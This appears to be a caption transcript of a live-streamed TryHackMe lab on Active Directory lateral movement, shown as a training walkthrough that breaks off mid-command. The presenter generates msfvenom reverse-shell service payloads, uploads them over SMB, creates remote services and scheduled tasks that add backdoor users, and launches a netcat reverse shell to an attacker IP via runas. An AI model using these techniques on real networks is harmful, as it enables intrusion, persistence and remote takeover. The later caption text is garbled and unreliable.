Lateral Movement - Part 1 [Active Directory Hacking] -- TryHackMe LIVE!

Captions
So, boom, and we are live. What is up everyone, Tyler Ramsey here, back with another video. Whether you're watching this on Twitch as it happens, after the fact, or catching me later on my YouTube channel, I just want to say it's an honor to have you hang out with me. We'll be on for the next, I don't know, hour and a half to two hours, and we are gonna do some live hacking and just learning hands-on cyber security stuff.

What we are going to do for this stream is TryHackMe released the most recent, uh, Active Directory network for lateral movement and pivoting, and the only thing I've done so far is I started the network. Amoeba Man is on Discord with me and he is a staff member at TryHackMe, and he told me this one might be broken, so we're gonna see what happens. We'll do some live troubleshooting on the spot, but like I said, I have not really even looked at this, so we're gonna go into it fresh. So I would encourage you to follow along with me if you would like. The way you can get here is if you go to the TryHackMe website, the easiest way is we have new rooms right here, and we have this Lateral Movement and Pivoting. So if you click that, go ahead and start the network, because it takes a little bit of time to get everything going. That's the only thing I've done up to this point, and you are welcome to use the AttackBox if you want. I prefer to use my own VM; I think it helps with just learning, troubleshooting and figuring things out. And I'm going to go ahead and make a directory on my Kali Linux machine for this room and see if we can get things organized. I am just gonna call it, we'll just call it pivoting. So I'm gonna open this up, mkdir pivoting, if I learn how to spell, and it should be empty. Perfect. So, uh, let's go ahead and dive into it, and what I like to do, especially when I do this live, is take it slow, right? The goal is not to rush through; the goal is to learn, um, as we do it.

So let's take it slow, let's read all of the text and see what we can learn. I'm gonna go pull up Twitch over on the side here so I can monitor the chat on here. So the couple of you joining on Twitch, welcome; those of you on Discord, good to have you as well.

So, in this room we will look at lateral movement, a group of techniques used by attackers to move around the network while creating as few alerts as possible. We'll learn about several common techniques used in the wild for this end and the tools involved. It is recommended to go through the Breaching AD and Enumerating AD rooms before this one, and I have already did both of those. I think I did both of them in two parts; you can catch those on my YouTube channel. You can get to that on Twitch if you go to About, or just go to YouTube and search for Tyler Rams, but you should be able to find my page on there. But you are welcome to do those and follow along with my video if you so choose.

So our learning objectives for this series, for this room: familiarize yourself with the lateral movement techniques used by attackers, learn how to use alternative authentication material to move laterally, and learn different methods to use compromised hosts as pivots. And once again I'm going to adjust my headphones, there we go, just adjusting the mode on them.

All right, connecting to the network. This might be the most confusing part, um, let's see if we can make our way through this. If you're using the web-based AttackBox, we're not, blah blah blah. I'm still gonna glance through here. We are not using the AttackBox; if you are, I encourage you to read that. I'm assuming we're going to set this up similar to how we set it up before, uh, DNS, blah blah. You should take the time to note your IP. Other hosts: if you're going to use your own attack machine, that is awesome. An OpenVPN config file has been generated for you once you join the room; go to the access page. And I'm going to have to do this on my VM, so let's go ahead and go here, and just like all the other networks,
you have to download a separate, uh, VPN file. So just know that when you do networks you can't use your normal TryHackMe VPN file; the networks are each going to have a separate VPN file to get you on that network. Why is it making me do this? Those are the chimneys, I promise you I'm not a robot, it's really me. Come on TryHackMe, I believe in you. Thank you. Okay, so you click Networks over here and Lateral Movement and Pivoting, let's go ahead and download the configuration file, save, perfect. And we'll just do openvpn /home/kali/Downloads, and there it is. So far so good. Let's name this terminal for now and see what our IP is. I believe that's going to be our IP for this room, yeah, lateral movement, you can see the name right there, so that's our IP. Let's go ahead and see, we probably add something to our, uh, /etc/hosts file would be my guess, or maybe our DNS. Let's see what we need to do. So we use the OpenVPN client, we did that, we did that. I guess we could verify that we have access here, as it says, change the lateral movement, and we do. Yep, so all that is good. You still need to configure DNS. Summary of what was shown above: it's important to note that although not used, the DC does log DNS requests. So we're going to use Kali, we're going to use our Network Manager, and we're going to set our DNS to, I'd assume, the domain controller right there, so that is the 10.200.80.101. So let's go ahead and do that, and the way you can do that is with the GUI: you can just do Advanced Network Configuration, here's our wired connection, go over to IPv4 Settings, and we can add an additional DNS server. I should turn Num Lock on. And I already forgot the IP after literally just looking at it: 10.200.80.101. Okay, 10.

Hit save, close that out. Then we have to restart it, which I believe is systemctl restart NetworkManager. That will just take a second. Make sure we have a connection there. Cool, so we have a connection to the internet. And then there was a command we can run to verify that we connected to the DNS, which is, let's go and try to ping this host it says. So let's give that a shot. Shoot. Oh, I think it was going, I was just impatient, hold up. Yep, just being a little bit slower, but we did get, uh, a reply back, so that is a good sign. See if there's anything I missed there. We can do the nslookup, so we can also verify it this way to make sure the DNS is working, which it should be. There we go. Okay, first step is done, we were able to get on the network. If you were stuck on that part, just slow down and read through this; the only reason I kind of sped through it is I've done this a few times now.

All right, requesting your credentials. To simulate an AD breach, you will be provided with your first set of AD creds. And what I'm going to do right now is just go ahead and get a side-by-side view. So the AttackBox kind of does this automatically, but we're going to make our own little side-by-side view, if my computer doesn't freeze in the process. This does kind of screw up some of the formatting in your Kali box, I've noticed, when you run commands, so we'll see how it goes. Okay, the simulated breach: you're provided with your first set of AD credentials. Once your networking setup has been completed on your AttackBox, navigate to there to get our credential pair. So let's go ahead and do that, and the reason for that, of course, is simulating after you got that initial low-level AD user. Oh, apparently it didn't copy, let's try that again. Okay, how about copy link, there we go. So this is like we had a successful phishing email, uh, compromise, so we got some low-level creds. So here are our creds, and what we'll do is we'll go back to here and we'll just echo those creds, and we'll just call it creds.txt, so we have them
right there. Okay, the simulated AD breach, blah blah blah. The credential pair will provide you SSH access to the jump box, which can be seen as a jump host in the environment to simulate a foothold that you have achieved. For SSH access you can use the following command, and we are jenna.field at thm.tryhackme.com, yes, password income1982. All right, so far so good. Let's just rename this 'our shell'. A note on reverse shells: if you're using the AttackBox, which we're not, um, let's see, for convenience it's called that, or 'movement'. So if using the AttackBox, read this; we're not using it, so I'm going to keep moving through the network.

Okay, what is lateral movement? Simply put... hey, actually, you know what, I need to start our timer. I try to do this in 25-minute intervals and take five-minute breaks. That's also how I do my normal work day as well; I think it's just healthy, and during the five-minute break get up, walk around. So the timer has started, we are officially starting. Let's do this.

So what is lateral movement? Simply put, lateral movement is the group of techniques used by attackers to move around a network. And yes, Nate, I agree. Once an attacker has gained access to the first machine of a network, which we have here, is our jump box, moving is essential for many reasons, including the following: reaching our goals as attackers, bypassing network restrictions, establishing additional points of entry, creating confusion and avoiding detection. While many cyber kill chains reference lateral movement as an additional step on a linear process, it is actually part of a cycle. During the cycle we use any available creds to perform lateral movement, giving us access to new machines where we elevate privileges and extract credentials if possible. With the newfound creds, the cycle starts again. So we have our initial recon, so in this simulation that is done; our initial compromise, that is done; our established foothold, that's kind of done, we have this SSH foothold. What we're going to work on is essentially escalate privileges, internal recon, move laterally, maintain presence, and we keep going through this cycle until we complete our mission. Usually we'll repeat the cycle several times before reaching our final goal on the network. If our first foothold is a machine with very little access to other network resources, we might need to move laterally to other hosts that have more privileges on the network.

A quick example: suppose we are performing a red team engagement where our first goal is to reach an internal code repository, where we got our first compromise on the target network by using a phishing campaign. Usually phishing campaigns are more effective against non-technical users, so our first access might be through a machine in the marketing department. Marketing workstations... well, I bet anyone who's watching this who might be in marketing just got offended. Marketing workstations will typically be limited through firewall policies to access any critical services on the network, including admin protocols, database ports, monitoring services or any other that aren't required for their day-to-day labor, including code repositories. To reach sensitive hosts and services, we need to move to other hosts and pivot from there to our final goal. To this end, we could try elevating privs on the marketing workstations and extracting local user password hashes, maybe like CrackMapExec, I think, would do something like that. If we find a local admin, the same account may be present on other hosts. After doing some recon, we find a workstation with the name DEV. We use the local admin password hash, so we're doing a pass-the-hash attack, and confirm it's owned by one of the developers in the company. From there, access to our target code repository is available. So we got our marketing PC, we did that through internal recon, we did a pass-the-hash attack, and then we got to the code repository. Notice that while lateral movement might need to be used to circumvent firewall restrictions, it is also helpful in evading detection. In our example, even if the marketing workstation had direct access to the code repository, it is probably desirable to connect to the developer's PC; this behavior would be less suspicious from the standpoint of a blue team analyst checking audit logs.

The attacker's perspective. There are several ways in which an attacker can move laterally. The simplest way would be to use standard administrative protocols such as WinRM, RDP, VNC or SSH to connect to other machines around the network. This approach can be used to emulate regular users' behavior somewhat, as long as some coherence is maintained when planning where to connect with what account. While the user from IT connecting to the web server via RDP might be usual and go under the radar, care must be taken not to attempt suspicious connections, like, yo, why is the local admin connecting to DEV from the marketing PC? Attackers nowadays also have other methods of moving laterally while making it somewhat more challenging for the blue team to detect what is happening effectively. While no technique should be considered infallible, we can at least attempt to be as silent as possible, and the following task will look at some of the most common lateral movement techniques available.

Administrators and UAC, or User Access Control. For performing most of the lateral movement techniques introduced throughout the room, we will mainly use admin creds. While one might expect that every single admin account would serve the same purpose, a distinction has to be made between two types of administrators: local accounts part of the local admin group, and domain accounts part of the local admin group. The differences we are interested in are restrictions imposed by UAC over local admins, except for the default Administrator account. By default, local administrators won't be able to remotely connect to a machine and perform administrative tasks unless using an interactive session through RDP. Windows
will deny any administrative tasks requested via RPC, SMB or WinRM, since such administrators will be logged in with a filtered medium integrity token, preventing the account from doing privileged actions. The only local account that will get full privileges is the default Administrator account. Domain accounts with local administrator privileges won't be subject to the same treatment and will be logged in with full administrative privileges. The security feature can be disabled if desired, and sometimes you will find no difference between local and domain accounts in the Administrators group. Still, it is essential to keep in mind that should some of the lateral movement techniques fail, it might be due to using a non-default local admin where UAC is enforced. You can read more details about the security feature here; it just brings us up to Microsoft Docs.

All right, spawning processes remotely. Drink of water first. This task will look at available methods an attacker has to spawn a process remotely, allowing him or her to run commands on machines where they have valid creds. Each of the techniques discussed uses slightly different ways to achieve the same purpose, and some of them might be a better fit for some specific scenarios.

PsExec uses port 445 over TCP, requiring group membership in Administrators. PsExec has been the go-to method when needing to execute processes remotely for years. It allows an administrator user to run commands remotely in any PC where he has access. I use this all the time in my job; I was actually messing around there a little bit right before I went live on stream, for work. PsExec is one of the many Sysinternals tools that can be downloaded here. The way PsExec works is as follows: connect to the ADMIN$ share, upload a service binary (PsExec uses PSEXESVC.exe, is the name), connect to the Service Control Manager to create and run a service named PSEXESVC and associate the service binary with it, and create some named pipes to handle those things. So we have this: we upload a service executable to this ADMIN$ share, essentially the attacker creates and executes a service, and then we communicate through the psexec pipe, and that's our named pipe. To run PsExec we only need to supply the required administrator creds for the remote host and the command we want to run. PsExec64.exe is available under Tools on THMJMP2 for your convenience. Let's go ahead and just navigate to that, and oh, we got SharpHound, we got netcat, we got mimikatz, sweet. All right, um, so are we just supposed to do that to run? Yeah, I suppose so. What computer are we attacking? If we are on our jump box, are we... maybe it's just showing us the syntax. Oh, let me scroll down. To run PsExec we only need to supply the required administrator, blah blah blah, and THMJMP2 for your convenience. So I think it's just showing us the syntax for that. So you can see we're running PsExec64, that's the machine IP, if we're launching a certain computer, running as administrator, there's our password, and we're launching cmd.exe, it's just a command prompt.

Remote process creation using WinRM. Here's the port for that, 5985 over TCP, that's HTTP, and then of course HTTPS is 5986. Required group membership: Remote Management Users. Windows Remote Management, WinRM, you may have also heard of evil-winrm on Kali, is a web-based protocol used to send PowerShell commands to Windows hosts remotely. Most Windows Server installations will have WinRM enabled by default, making it an attractive attack vector. To connect to a remote PowerShell session from the command line, we can use the following command, and I don't see the tool here, but you're running that, you're specifying your user, specifying your password, and then what we're launching. We can achieve the same from PowerShell, but to pass different creds we will need to create a PSCredential object. Interesting. So for PowerShell we're setting a variable for our username, we're setting a variable for our password, and secure password, ConvertTo-SecureString, that's just going to be the asterisk-type stuff, password as plain text; credential, another variable, New-Object System.Management.Automation.PSCredential with username and secure password. So we're just taking the things, our variables from up there, and passing them there. Once we have our PSCredential object, we can create an interactive session using the Enter-PSSession cmdlet, and if you've never done that, it's kind of like an SSH connection but through PowerShell. So, um, if you're a system admin you probably use this pretty often; I do it often just to poke around on computers when I'm trying to figure something out, because the end user doesn't detect, at least not very easily, that you've opened a PS session on their computer. PowerShell also includes the Invoke-Command cmdlet, which runs script blocks remotely via WinRM; credentials must be passed through a PSCredential object as well. This is if you have a specific... so you can run a script block here, you can also, if there's a script that you're using, like I don't see any of these, a script, I know there's a SharpHound.ps1, you can actually pass actual scripts as well. I think it's slightly different syntax, but it's a very similar process.

Remotely creating services using sc. Here's our ports for that; you can read through those on your own. Required group membership: Administrators. Windows services can also be leveraged to run arbitrary commands, since they execute a command when started. While the service executable is technically different from a regular application, if we configure a Windows service to run any application, it will execute it and fail afterwards. We can create a service on a remote host with sc.exe. Might be socat there, I don't know. So I think sc and the schtasks one and the winrs one are still defaults of, um, Windows, so they're native binaries. So if you run sc, that should work. Perfect, I'll just do that. Yeah, so show me the help file there. Oh, let's see, Windows services, blah blah, we can create a service on a remote
host with sc.exe. Oh yes, I should just keep reading. When using sc, it will try to connect to the Service Control Manager remote service program (svcctl) through RPC in several ways. Number one, a connection attempt will be made using DCE/RPC. The client will first connect to the Endpoint Mapper, or EPM, at port 135, which serves as a catalog of available RPC endpoints, and request information on the svcctl service program. The EPM, or Endpoint Mapper, will then respond with the IP and port to connect to, which is usually a dynamic port in this range. Dynamic means it's going to change depending, like, on when you make the connections; it's different each time. So here's our client: where is svcctl? The EPM on port 135 on the server says, hey, it's on port 50123, and then we do the RPC bind. If the latter connection fails, sc will try to reach svcctl through SMB named pipes, either on port 445 or 139, which is SMB or SMB over NetBIOS; you can see that there. We can create a service named THMservice using the following commands, and maybe I'll just try this. I don't know if we need the .exe. So if we do service and then, I mean, our target... so I should ask Amoeba Man: are we supposed to be running these commands on one of these machines, or is this just explaining the syntax right now?

So it's explaining the syntax for you, and then what's going to happen at the end, there's going to be a section where, let's do the work now. Um, and technically you can choose to do any of the techniques explained in the room to do that. So it's about all of them almost doing the same thing, but you would use a different one based on your specific attack. So for example, if some of the ports are filtered on a host-based firewall, then you can't, for example, move via service creation; then you might choose to move through something like a scheduled task or through a PowerShell session. So it's about teaching you the different techniques, and then you can decide which one is going to be based on the specific circumstances that you are faced with on your assessment.

Okay, cool. What we'll probably try to do is we'll just do every single one, we'll learn each one, so we'll redo it, and then when we get to that part we'll just see how many we can do. Uh, creating scheduled tasks remotely, oh, let's see, so I was here. We create, okay, this is just showing how to start a service named THMservice using the following commands, right? So we have sc.exe, our target, create THMservice, so the name of the service, the binPath, net user, oh, so we're creating the user, or create, giving the password, adding... so we're creating a service that essentially is adding a user to have like a backdoor account to establish persistence. start= auto, I suppose, every time the computer turns on it's starting that up, or when the service starts, I should say, it's gonna run that. sc.exe target, and then we're gonna start the service, and then when the service starts it should create the munra user with that pass. The net user command will be executed when the service has started. Okay, just like how I explained it as I was looking at it. To stop and delete the service, we can then execute the following commands; of course you'd want to do that to clear up your tracks.

Creating scheduled tasks remotely. Another Windows feature we can use is scheduled tasks. You can create and run one remotely with schtasks, available in any Windows installation. To create a task named THMtask1, we can use the following command: schtasks /s target /RU system /create /tn THMtask1 /tr command/payload to execute. So you could... so then you're specifying, like, how often to run. So you could run a scheduled task that, I suppose, pings back to your attack system; you could use this to probably establish some type of shell. And that's running the task. We set the schedule type, /SC, to ONCE right there, which means the task is intended to run only once at the specified time and date. Since we will be running the task manually, the starting date, /SD, and starting time, /ST, won't matter anyway. Okay, so it doesn't matter what you put in there. Since the system will run the scheduled task, the command's output won't be available to us, making this a blind attack. Finally, to delete the scheduled task, we can use the following command and clean up after ourselves.

All right, let's get to work. Let's get a drink of water; a lot of reading. To complete this exercise, you will need to connect to THMJMP2, which we should still have our connection here. I know that sometimes, if your network's not working, the networks do time out after a certain amount of inactivity, so if yours doesn't work, try to restart it, or every once in a while just type a command here so you can ping the network. All right, to complete this exercise you'll need to connect to THMJMP2 using the creds assigned to you; we've already done that. If you haven't done so yet, click on the link, blah blah. Once you have, we've done that. For this exercise we assume we've already captured some creds with administrative access. Okay, so those are going to be our creds. We'll show you how to use these creds to move laterally to THMIIS, so that's going to be like the web server, using sc.exe. Feel free to try the other methods, as they should all work against it. So let's just glance real quick one more time at how this network is set up. So we are on this JMP2 box right here, and we're going to connect to this, which I'm guessing is a web server, would be, there's some type of web server. Uh, let's see here, we are well below. We've already shown how to use sc to create a user on a remote system. By using that user, we can also upload any binary we'd like to execute and associate it with the created service. However, if we try to run a reverse shell using this method, we will notice that the reverse shell disconnects immediately after execution. The reason for this is that service executables are different to standard .exe files, and therefore non-service executables will end up
being killed by the service manager almost immediately. Luckily for us, msfvenom supports the exe-service format, which I don't think I've ever used, which will encapsulate any payload we like inside a fully functional service executable, preventing it from getting killed. Very cool. I'm just gonna navigate to my folder here on my attack box. All right, to create a reverse shell we can use the following command. Note: since you will be sharing the lab with others, you'll want to use a different file name for your payload instead of myservice.exe. Okay, that makes sense, um, to avoid overwriting someone else's payload. Okay, sounds good. So msf, whoops, msfvenom -p for essentially the type of payload, we're gonna do windows/shell_reverse_tcp, -f for file, and it looks like we have the file type of exe-service, LHOST, this is going to be your attacker IP. I don't remember mine. You know, I should be like the cool kids, just ip a is the new way to do this kind of thing. Oh, something new that I never knew: don't copy your IP, copy the word 'lateral movement'? Sure. Actually works? I never actually knew that, but you can use that and it will automatically resolve the IP for you. Sure, good. I kind of knew that in the back of my head, but I never do it, but it makes a lot more sense; it saves on human error, and anything that can save my human errors is good. We'll use port 4444, that's a standard msfvenom or Metasploit port. Of course, if you're doing this on a real assessment, you probably don't want to use the port that is like always blocked by firewalls, but we'll do it here. -o for what we want to call it, and it said don't call it myservice.exe, so I'm going to call it hacksmarter.exe. And once again, if you're kind of new to this, you'll notice I'm doing this on my attack machine, and here's the victim machine. So once we do it on the attack machine, we will transfer it over to our victim, I'd assume. Let's see, we'll then proceed to use the t1_leonard.summers credentials to upload our payload to the ADMIN$ share of THMIIS using smbclient from our attack box. We got five minutes left, y'all, just so you know, if you're waiting for that break. Uh, using smbclient from our attack box, okay, cool. Once our payload is created... and we're going to set up a listener, so we'll just go ahead and get that started as well. Let's open that, and do we have it there? There it is, hacksmarter.exe. So smbclient, if I can spell, -c put hacksmarter.exe, we're going to specify our user t1, which probably means tier one admins; this is a low-level admin account, but with some administrative privileges. -W za.tryhackme.com must be the domain there, and whoops. You can always copy and paste this, but as I always say, I like to just type because it helps me learn the syntax and it's not as brainless that way; I think you learn a little better when you type it and make mistakes as you type it, which you'll probably see me make mistakes. Looks like our password is EZpass4ever. I think they'll make that my real admin password for work; it's a good password. Oh, was that the password? Yeah, EZpass4ever. Okay, let's see what happens. Okay, while that works or breaks, one of the two, let's go ahead and use exploit/multi/handler, I believe. options. So we should be able to set our LHOST to lateral movement, I think that's what it was called, yep, so you can see it set right there. We have LPORT 4444. I always like to set the payload to match, um, what I do here. Oh yeah, and it has to do it there. I just know sometimes, I mean sometimes I'll catch it even if you don't set the payload, but I've noticed sometimes it also won't, but when I set the payload it just seems to work better. So they have us set the LHOST, oh look at that, they did lateral movement as well, and then set the LPORT, which is already set for us. We set the payload, and then we can just run that, and we'll just call that 'meterpreter'. We'll hope that we get that, and go back to here. This doesn't seem to have worked. I might try to run it again, see if I missed anything.

What's this? "Alternatively, you can run the following one-liner on your Linux console to do the same." NT_STATUS_CONNECTION_RESET. I wonder if I did something wrong. Let me just look at my syntax here: smbclient -c put hacksmarter.exe -U t1_leonard.summers -W za.tryhackme.com. We have that, which should match the server. We could, I mean, what we could try, I'd assume we'd be able to do the actual IP here. Let's try that. Whoops. I don't know if this will go any smoother or not; maybe it's just not resolving the name for some reason, well, or it's because I have the password right there on the end there. Let's try that. If that doesn't work, I'm gonna... hey, so for those of you watching, if you ran into that issue, try to just replace the name right there with the direct IP. Maybe that's just a little bug or I did something wrong, but either way, that seemed to have done it. Let's look down here. Alternatively, you can use the following one-liner on your Linux console to do the same. Oh cool, so then I have to wait for msfconsole to open. I didn't know that trick either, actually. I think I saw Nate do this, didn't you do this the other day, Nate? Is he still on here? Oh no, he's not. I think I saw him do it, now that I think of it. All right, since sc.exe doesn't allow us to specify creds as part of the command, we need to use runas to spawn a new shell with t1_leonard.summers' access token. Still, we only have SSH access to the machine, so if we try something like that, the new command prompt would spawn on the user's session, but we'd have no access to it. To overcome this problem, we can use runas to spawn a second reverse shell with t1_leonard.summers' access token. You know what, I'm looking at our timer, we have just 20 seconds. I think this might be a good break point, so I'm gonna go on break. I'm gonna step away from my computer, and I'm gonna actually stop my timer quick; we'll stop that. Uh, let's take a five-minute break. Step away from your computer, walk around, jump up and down, do whatever you want, and we'll be back in exactly five
minutes. So...

Hey, what is up everyone, welcome back to the live stream. Let me get Twitch pulled back up and then we will dive back into things. Oh, Nate's just watching on Twitch. Yes, I use dash key dash a bit, yes. Oh shoot, oh, I'm not muted for you? Um, one second, sorry, I was only on mute for you; it's coming over Twitch, I just forgot to unmute it on Discord. Thanks, yeah, thank you. All right, let me go ahead and share my screen and we'll pick up where we left off.

Okay, so we were gonna spawn a reverse shell as t1_leonard.summers, and I was kind of curious about that, because the last time we used runas, I don't remember if it's one of these networks or if it was elsewhere, we had to RDP in order to get it to work, because if you have an RDP session then you can do that, because it will spawn it, but you can't do it as SSH, blah blah blah. To overcome this problem, we can use runas to spawn a second reverse shell with t1_leonard.summers' access token. Very cool, I've never done that before. So, oh, we got to go, this is gonna be in our victim machine. Make sure we still have a connection here; that we do. So runas /netonly /user:za.tryhackme.com, that's our domain, \t1_leonard.summers, c:, well, the case doesn't matter, tools, there's... oh shoot, did I accidentally hit enter? Can I go up? Okay, cool. c:\tools\netcat64.exe -e, we're going to launch cmd, and now we want our IP, and so that's that right there. I don't think the 'lateral movement' trick will work on this part, maybe, yeah, I don't think it would; in my head it doesn't work. Oops, so, like, that's only going to work on our local machine. Come on. So we have that, and it looks like we're doing port 443, so it's going to get our listener set up, I mean just a simple netcat listener like that. Close, oh, this is called this terminal, okay. Let's check our syntax, 4443, let's close our quotation there and see what happens. Enter the password, that was like that easy pass something, super easy pass or something, easy pass forever, easy pass forever. What did I do wrong there? I should have launched it as Leonard.

So just quickly there, you did nothing wrong there, right? If you look at that runas command, one of the flags you have there is /netonly. Um, and if you remember from the Enumerating AD network, right, the /netonly flag is a very special flag, because essentially what it does is it still launches in the normal user context for you, because for instance that t1_leonard.summers user might not have the ability or the permissions to actually log into the host that you're currently logged into. So it just passes it, and it means that it will now use those credentials for network-only connections. So now when you run a command, while it looks like you're running it as jenna.field, it will actually execute as the leonard.summers guy. And then one thing that I see that wasn't mentioned here is, um, it might be good to test whether or not you specified that password correctly, because remember, /netonly will take in any password that you give it, because it's not verifying the account anyway. Um, so in your other terminal, if you wanted to, you could just run a dir on the SYSVOL directory, um, to just basically make sure that it works. So that would just be your dir and then backslash backslash za.tryhackme.com\SYSVOL, and if that works, you know that the password was correct, and if it wasn't, um, it will actually tell you that the password is incorrect.

So yeah, credentials are working. Okay, cool, that's good. Yeah, that'd be helpful to explain on here; maybe they explain that, maybe they don't. No, I don't think they do. But that makes sense, now that you say that; it's kind of clicking in my head. I remember that being explained in, what was that, was probably, is that Enumerating AD or Breaching AD? Obviously it was one of those; I still remember which one. All right, the new command would spawn on the user's session, but... well, let's scroll down, we already did that. Finally, proceed to create a new service binary remotely by using sc, associated with our uploaded binary. Okay, so we need to go ahead and grab that binary down, so we could go to C:, probably go to like, whoops, didn't mean to do that, should be a temp folder, yeah, we probably have write access to there. So if you see anyone else, nope, they haven't done it. So there's multiple ways you could transfer this over here; what I'm going to do is just the standard Python web server, so python3 -m http.server, we'll keep it at port 80, and then we can use something like certutil to grab that. We'll see if I remember the syntax by heart: certutil -urlcache -f, I think, http://10., whatever my IP is right there; I have my TryHackMe IP memorized, I just don't quite have this one memorized yet. Try that, and then we called it hacksmarter.exe, I think, and I think you have to do outfile, maybe. I may have totally messed up that syntax. Yep, I think I did.

Quick note: why are you trying to copy that file over to the workstation?

Oh, I already did it. Yeah, I don't know why I'm trying to, I did it with the... this is what happens, I took my five-minute break. We already did that with smbclient, thank you, good catch. It's already in the ADMIN$ here.

Yes, and a note here as well: the nice thing is you do have SSH as well, which, again, I like that you're testing certutil, because you won't probably have SSH out there, but scp, um, sometimes makes life easier. But yes, for real-world cases certutil is probably going to be the thing that works.

Every time I use scp I always have to look up the syntax for that; I don't know why. I know certutil better, probably just because I've used it more in CTFs. But all right, let's see where we're at. Create a new service remotely by using sc, so let's go ahead and give that a shot, and that's just the... so there's a chance, because this didn't work before with the name, so if this doesn't work you may just have to specify the IP on it, but we'll do create THMservice3249 binPath= and here
is what we did let's just try this so wind directory how they want us to do it i think it would be probably the admin one i think is just specify and do the win directory there i think i don't know let's find out we'll try both just a note there um you just need a space for your bin path um ac is very very peculiar about where it spaces is and i think it's because you have the screen and split screen and that is not showing the spec probably yes and then when the specifier see windows which i'm pretty sure that admin share automatically places inside the windows directory if you do something like smd client gotcha cool so if we do hack smarter.exe start equals and there's that space i do see that space start equals auto and so that just means it's going to start automatically we run the service let's try that see if anything breaks open sc manager failed okay let's uh glance at my syntax we may just change the ip over i have this bad shell um let's let's try to do it by ip so that's 10.200.88 create thm service 3249. 
then path equal space lender packsmarter.exe start equals auto oh the specified service already exists unless somebody else made the service on the machine um we'll just try to run it and if it doesn't we'll just rerun that and use a different name for the service unless it did create it the first time okay be sure to change the name you oh okay let's try to redo that and change the name of our service i bet someone else already made it specifically says to change the name of your service which would make sense thm service i'm gonna call it hack smarter service we'll just call it hack smarter 3249 bin path equips equals space rotation winder i just realized i never started my timer i always forget to do that crap let me start my timer there we go okay winder that hacksmarter.exe start equals auto create service success wait so once again if you guys are watching this after the fact it doesn't work the first time to try to specify the actual ip that seems to get past that that just very minor bug be sure to change the name of your service once you have started the service you should receive a connection in your attack box i think we still yep we still have that running because that should be on that port 444 and i think it's just sc start service if we scroll up i know the syntax was up here yeah sc.exe stop i see exe target start thm service i don't think we need target so remember you're trying to remote spawn a service right if you just type ac start it's trying to look for local servers which is why we we always start there but just maybe check i think it might not work because i think you have a typo there for your windows directory but start it see if when dr also works for windows directory i'm interested to see let's find out so our target is going to be this i'm just going to do the ip as well since it wasn't working before so we should be ses dxe the sc.exe start and then we should just be able to specify our service that we created which was the hack 
smarter thing start service open the file name directory name a volume label let's try this i think that's the windy r1 that's that's fade that's my issue oh but also yeah just make sure it should be 201 let's see you specify 21. oh i typed the ip wrong there i did okay let's go back and retype our stuff let's go here if i can just scroll up and see what i did wrong oh yep i see i see i see so let's let's retype it practice makes not perfect and we're going to specify the ip and we're going to create we'll call it we're created a hack smarter so we're going to call tyler wins we'll call that the name of the service bin path equals space quotations w-i-n-d-i-r that and um am i looking yeah doing the right thing if i get the correct backslash here create tyler wins blah blah and this is gonna be our hacksmarter.exe start equals auto glance at this sc.exe create tylerwinds3249 bin path winder hacksmart.exe start equals space auto let's try that create service success okay so far so good and now if we do our sc.exe start we're going to specify our path because it's remote 201 and now this is called tyler wins just swap that start and that ip around i don't know if it makes a difference but just follow this turn broke it scroll back up over here i guess if my scroll here doesn't work 10.200.80.201 start start and then we called it tyler wins let's just make sure i type that stuff correct since i checked this up okay i mean i think you named it tyler wins three two four nine ah let's try that [Applause] [Music] hey look at that we have an interpreter show hopefully [Music] nt authority systems that's like the root equivalent on windows so we do a few more but we just got something done after running the flag.exe file on t1 leonard's desktop on thmis what is the flag well we'll find out geez i can't type tonight [Applause] moving with services all right let's keep moving hey what up hunter boss sorry to even see you tight this hunter boss said on twitch's new network 
looks great yeah it's interesting as long as you don't make silly mistakes it's it's like a lot of content packed in here though i love it all right moving laterally using wmi we can also perform many techniques discussed in the previous tasks differently by using windows and management instrumentation wmi is windows implementation of web-based enterprise management and enterprise standard for accessing management information across devices in simpler terms wmi allows administrators perform standard management tasks that attackers can abuse to perform lateral movement in various ways which we shall discuss connecting to wmi from powershell before being able to connect to wmi using powershell commands we need to create a ps credential object with our user and password this object will be stored in the credential variable and utilized throughout the techniques on this task are we actually using this as our account just glancing through here i think we are oh that's complete see oh that might be our countdown there okay we'll scroll back up we'll read through this so we already went through that once we'll proceed to establish wmi session using either the following protocols dcom rpc over ip will be used for connecting to wmi this protocol uses port 135 and those ports just as explained with using sc.exe wsman win rm will be used for connecting to wmi this protocol uses these ports and that port to establish a wmi session powershell we can use the following commands and store the session on the session variable which we will use throughout the room on different techniques opt variable new ciem session option protocol dcom and then we're setting a session variable new cim session our computer name it's going to be our target that's going to be the ip that we're connecting to in this context because the that seems to be the easiest credential we're just pulling down uh the credential variable from up there session option opt interaction stop the new cim session option 
command is used to configure the connection options for the wmi session including the connection protocol the options and credits are then passed to the new cim session commandlet to establish a session against a remote host remote process creation using wmi we have these ports require group memberships administrators again i feel like no is this correct i feel like i read this already i read some of it i think um blah blah are then passed okay we can remotely spawn saying wmi request to the 132 process class to spawn the process under the session we created before okay interesting so here's our command of course we're doing powershell command set content path value monroe is here okay so in this we're just essentially touching the file invoke command session class name method arguments command line equals command notice that wmi won't allow you to see the output of any command but will indeed create the process silently so you could you know create your own output like that on legacy systems the same can be done using wmic from the command prompt which i have used that before at some point in time creating services remotely with wmi we can create services with wmi through powershell to create a service called thmservice2 we can use the following command okay glancing through this so there's the name display name path name oh so this is a service that's going to create that monroe account kind of backdoor user start service start mode manual and then we can get a handle on the service and start it with the following commands name so service blah blah we're going to filter name like thm service 2 that matches up there and vote command input object start service fine we can stop and delete the service following commands clean up after ourselves creating schedule tasks remotely with wmi we can create and execute schedule tasks by using some command that's available in windows default installations payload must be split in command in arguments so okay i see so command 
and argument that's doing that same thing we're creating a user with that password and we're adding them new schedule task action session execute command action user nt authority system so you know instead of this we could run we get a reverse shell there's our task name delete let's go skill test after it's been used we can use the following command installing msi packages through wmi msi is a file format used for installers if we can copy an msi package to the target system we can then use wmi to attempt to install it for us the file can be copied in any way available to the attacker once the msi file is in the target system we can attempt to install it by invoking the 132 product class or wmi we can achieve the same by using wmec and legacy systems okay let's get to work let's do it all right we're the ssh we can close out leonard here interpreter we can close this out we'll probably have another one so we'll just leave that open for now what's this that's our python shell we don't need that right now either kind of start fresh start over go back to jenna make sure we still have a connection we do all right for this exercise we'll assume we've already captured some credits with administrative access so another tier one admin kareem 1994 very strong password we'll show you how to use these credits to move laterally to thmis the web server using wmi and msi packages cool feel free to try the other methods presented during this task we will start by creating our msi payload with msf venom okay from our attacker machine since you'll be sharing the love with others you'll want to use a different file name of course dash p windows x64 shell reverse tcp l host 